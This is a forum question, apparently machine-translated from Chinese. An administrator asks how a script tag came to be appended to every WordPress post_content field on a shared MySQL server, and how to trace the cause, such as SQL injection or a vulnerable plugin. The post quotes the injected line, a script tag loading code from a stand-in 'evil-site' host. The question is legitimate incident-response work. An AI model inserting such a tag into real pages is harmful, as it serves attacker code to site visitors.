我的客户遇到这样一种情况,即他安装在同一台mySQL服务器上的所有wordpress中的所有post_content字段都有一个JS脚本注入作为post_content追加。
示例:
如果帖子内容为this is my post,则在被黑客入侵后,其内容将变为this is my post<script src="evil-site/evil.js></script>
像这样更改post_content的最常见方法是什么? 你能提出一些想法让我研究一下吗?
我脑海中有些人是,mySQL密码已被盗用,但是我不认为是这样的原因,如果真是这样,他们就不会只留下损害了。同样,wordpress的管理员密码应该可以导致相同的令牌,他们本来可以创建PHP页面来造成更大的破坏。
通过本练习,我正在考虑违反插件。但是鉴于事实,我们在这里谈论的是wordpress ...到目前为止,我们已经通过类似的漏洞听说了插件和wordpress社区。 (我的客户WP安装和插件是最新的。)
您能想到其他想法如何将post_content像这样附加吗?如果这是SQL注入,那么跟踪它的最佳方法是什么? IIS日志似乎未记录wordpress URL。